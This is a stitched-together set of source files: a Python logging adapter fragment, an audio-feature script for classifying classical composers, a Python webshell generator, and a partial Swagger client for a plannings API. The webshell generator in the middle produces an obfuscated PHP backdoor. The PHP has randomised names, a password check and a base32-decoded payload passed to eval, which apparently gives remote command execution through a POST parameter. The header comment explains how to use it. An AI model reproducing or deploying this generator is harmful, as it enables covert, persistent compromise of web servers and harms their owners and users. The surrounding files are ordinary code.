        Log a message at CRITICAL level, attaching request context.
        :param msg: body of message
        :type msg: String
        :param args: list of positional arguments
        :type args: List
        :param kwargs: dict of keyword arguments
        :type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.critical(msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
        Log a message at the given level, attaching request context.
        :param level: numeric logging level
        :param msg: body of message
        :type msg: String
        :param args: list of positional arguments
        :type args: List
        :param kwargs: dict of keyword arguments
        :type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.log(level, msg, *args, **kwargs)
def __getattr__(self, name):
return getattr(self.logger, name)
    def inject(self, f):
"""
        Register a handler that injects extra fields into every log record.
        :example:
.. code-block:: python
app.logger.inject
def log_user(ctx):
d = {}
d['app_user'] = 'anonymous'
if ctx is not None and ctx.g.user is not None:
d['app_user'] = ctx.g.user.mailbox
return d
"""
self.extra_handlers.append(f)
return f
| bsd-3-clause | -2,105,913,396,540,555,800 | 29.170616 | 104 | 0.570531 | false |
GermanRuizMarcos/Classical-Composer-Classification | code_7_1/classification.py | 1 | 18072 | '''
AUDIO CLASSICAL COMPOSER IDENTIFICATION BASED ON:
A SPECTRAL BANDWISE FEATURE-BASED SYSTEM
'''
import essentia
from essentia.standard import *
import glob
import numpy as np
import arff
from scipy import stats
# Dataset creation with specific attributes (spectral features) and a specific class (composer's name)
'''
Audio files are transformed into the frequency domain through a 1024-sample STFT with 50% overlap.
The spectrum is divided into 50 mel-spaced bands.
'''
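# The analysis chain below mirrors that description: frames of 1024 samples
# with a hop size of 512 (50% overlap) and 50 mel-spaced bands per spectrum.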
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/bach/*.wav")
fft = FFT()
melbands = MelBands(numberBands = 50)
flatness = FlatnessDB()
rolloff = RollOff()
centroid = SpectralCentroidTime()
flux = Flux()
energy = EnergyBand()
zero = ZeroCrossingRate()
spectrum = Spectrum()
w = Windowing(type = 'hann')
mfcc = MFCC()
f = open('definitive_train.txt', 'wb')
f.write('@RELATION "composer dataset"\n')
f.write('\n')
f.write('@ATTRIBUTE MFCC-0 REAL\n')
f.write('@ATTRIBUTE MFCC-1 REAL\n')
f.write('@ATTRIBUTE MFCC-2 REAL\n')
f.write('@ATTRIBUTE MFCC-3 REAL\n')
f.write('@ATTRIBUTE MFCC-4 REAL\n')
f.write('@ATTRIBUTE MFCC-5 REAL\n')
f.write('@ATTRIBUTE MFCC-6 REAL\n')
f.write('@ATTRIBUTE MFCC-7 REAL\n')
f.write('@ATTRIBUTE MFCC-8 REAL\n')
f.write('@ATTRIBUTE MFCC-9 REAL\n')
f.write('@ATTRIBUTE MFCC-10 REAL\n')
f.write('@ATTRIBUTE MFCC-11 REAL\n')
f.write('@ATTRIBUTE MFCC-12 REAL\n')
f.write('@ATTRIBUTE flatness-mean REAL\n')
f.write('@ATTRIBUTE flatness-variance REAL\n')
f.write('@ATTRIBUTE rolloff-mean REAL\n')
f.write('@ATTRIBUTE rolloff-variance REAL\n')
f.write('@ATTRIBUTE centroid-mean REAL\n')
f.write('@ATTRIBUTE centroid-variance REAL\n')
f.write('@ATTRIBUTE flux-mean REAL\n')
f.write('@ATTRIBUTE flux-variance REAL\n')
f.write('@ATTRIBUTE energy-mean REAL\n')
f.write('@ATTRIBUTE energy-variance REAL\n')
f.write('@ATTRIBUTE ZCR-mean REAL\n')
f.write('@ATTRIBUTE ZCR-variance REAL\n')
f.write('@ATTRIBUTE flatness-std REAL\n')
f.write('@ATTRIBUTE flatness-hmean REAL\n')
f.write('@ATTRIBUTE composer {bach, beethoven, chopin, haydn, liszt, mendelssohn, mozart, vivaldi}\n')
f.write('\n')
f.write('@DATA\n')
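# Each row written below describes one audio file: the 13 MFCC means, the
# mean/variance of flatness, rolloff, centroid, flux, energy and zero-crossing
# rate, the flatness standard deviation and harmonic mean, then the composer label.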
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'bach'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 2
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/beethoven/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'beethoven'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 3
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/chopin/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'chopin'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 4
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/haydn/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'haydn'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 5
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/liszt/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
	for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'liszt'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 6
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/mendelssohn/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'mendelssohn'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 7
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/mozart/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'mozart'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
# 8
dirList = glob.glob("/home/usuario/Escritorio/SMC/2 term/Music Information Retrieval/Classical Composer Identification/code_7/data_echo/vivaldi/*.wav")
for audio_file in dirList:
flat = []
rol = []
cen = []
flu = []
ene = []
zer = []
mfccs = []
# Loading audio
audio = MonoLoader(filename = audio_file)()
for frame in FrameGenerator(audio, frameSize = 1024, hopSize = 512, startFromZero=True):
bands = melbands(spectrum(frame))
flat.append(flatness(bands))
rol.append(rolloff(bands))
cen.append(centroid(bands))
flu.append(flux(bands))
ene.append(energy(bands))
zer.append(zero(frame))
mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'vivaldi'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
f.write('%\n')
f.write('%\n')
f.write('%\n')
f.close()
| gpl-3.0 | 1,453,385,441,385,459,500 | 22.379043 | 155 | 0.597001 | false |
tennc/webshell | php/create_webshell_with_py.py | 1 | 2291 | import random
#author: pureqh
#github: https://github.com/pureqh/webshell
#use:GET:http://url?pass=pureqh POST:zero
shell = '''<?php
class {0}{1}
public ${2} = null;
public ${3} = null;
function __construct(){1}
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->{3} = @{9}($this->{2});
@eval({5}.$this->{3}.{5});
{4}{4}{4}
new {0}();
function {6}(${7}){1}
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 8;
$v += ord(${7}[$i]);
$vbits += 8;
while ($vbits >= 5) {1}
$vbits -= 5;
${8} .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);{4}{4}
if ($vbits > 0){1}
$v <<= (5 - $vbits);
${8} .= $BASE32_ALPHABET[$v];{4}
return ${8};{4}
function {9}(${7}){1}
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 5;
if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
$v += (ord(${7}[$i]) - 97);
{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
$v += (24 + ${7}[$i]);
{4} else {1}
exit(1);
{4}
$vbits += 5;
while ($vbits >= 8){1}
$vbits -= 8;
${8} .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);{4}{4}
return ${8};{4}
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
lef = '''{'''
parameter1 = random_name(4)
parameter2 = random_name(4)
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
fun1 = random_name(4)
fun1_vul = random_name(4)
fun1_ret = random_name(4)
fun2 = random_name(4)
shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
return shellc
if __name__ == '__main__':
print (build_webshell())
| gpl-3.0 | -521,559,099,805,396,200 | 27.283951 | 102 | 0.454387 | false |
Mapotempo/mapotempo-qgis-plugin | SwaggerMapo/apis/plannings_api.py | 1 | 44443 | #!/usr/bin/env python
# coding: utf-8
"""
PlanningsApi.py
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
"""
from __future__ import absolute_import
import sys
import os
# python 2 and python 3 compatibility library
from six import iteritems
from .. import configuration
from ..api_client import ApiClient
class PlanningsApi(object):
def __init__(self, api_client=None):
if api_client:
self.api_client = api_client
else:
if not configuration.api_client:
configuration.api_client = ApiClient('http://beta.app.mapotempo.com/api')
self.api_client = configuration.api_client
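    # Usage sketch (illustrative; assumes configuration.api_client or the
    # default endpoint has already been configured with a valid API key):
    #   api = PlanningsApi()
    #   plannings = api.get_plannings()
    #   planning = api.create_planning(name='Monday deliveries')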
def get_plannings(self, **kwargs):
"""
Fetch customer's plannings.
:return: list[V01Planning]
"""
all_params = []
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_plannings" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='list[V01Planning]', auth_settings=auth_settings)
return response
def create_planning(self, name, **kwargs):
"""
Create planning.
:param str name: (required)
:param str ref:
:param str date:
:param int zoning_id:
:param bool out_of_date:
:param list[int] route_ids:
:param list[int] tag_ids:
:return: V01Planning
"""
# verify the required parameter 'name' is set
if name is None:
raise ValueError("Missing the required parameter `name` when calling `create_planning`")
all_params = ['name', 'ref', 'date', 'zoning_id', 'out_of_date', 'route_ids', 'tag_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method create_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'POST'
path_params = {}
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'name' in params:
form_params['name'] = params['name']
if 'ref' in params:
form_params['ref'] = params['ref']
if 'date' in params:
form_params['date'] = params['date']
if 'zoning_id' in params:
form_params['zoning_id'] = params['zoning_id']
if 'out_of_date' in params:
form_params['out_of_date'] = params['out_of_date']
if 'route_ids' in params:
form_params['route_ids'] = params['route_ids']
if 'tag_ids' in params:
form_params['tag_ids'] = params['tag_ids']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def delete_plannings(self, ids, **kwargs):
"""
Delete multiple plannings.
:param list[Integer] ids: (required)
:return: str
"""
# verify the required parameter 'ids' is set
if ids is None:
raise ValueError("Missing the required parameter `ids` when calling `delete_plannings`")
all_params = ['ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method delete_plannings" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'DELETE'
path_params = {}
query_params = {}
if 'ids' in params:
query_params['ids'] = params['ids']
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def get_planning(self, id, **kwargs):
"""
Fetch planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `get_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def update_planning(self, id, **kwargs):
"""
Update planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str name:
:param str ref:
:param str date:
:param int zoning_id:
:param bool out_of_date:
:param list[int] route_ids:
:param list[int] tag_ids:
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_planning`")
all_params = ['id', 'name', 'ref', 'date', 'zoning_id', 'out_of_date', 'route_ids', 'tag_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
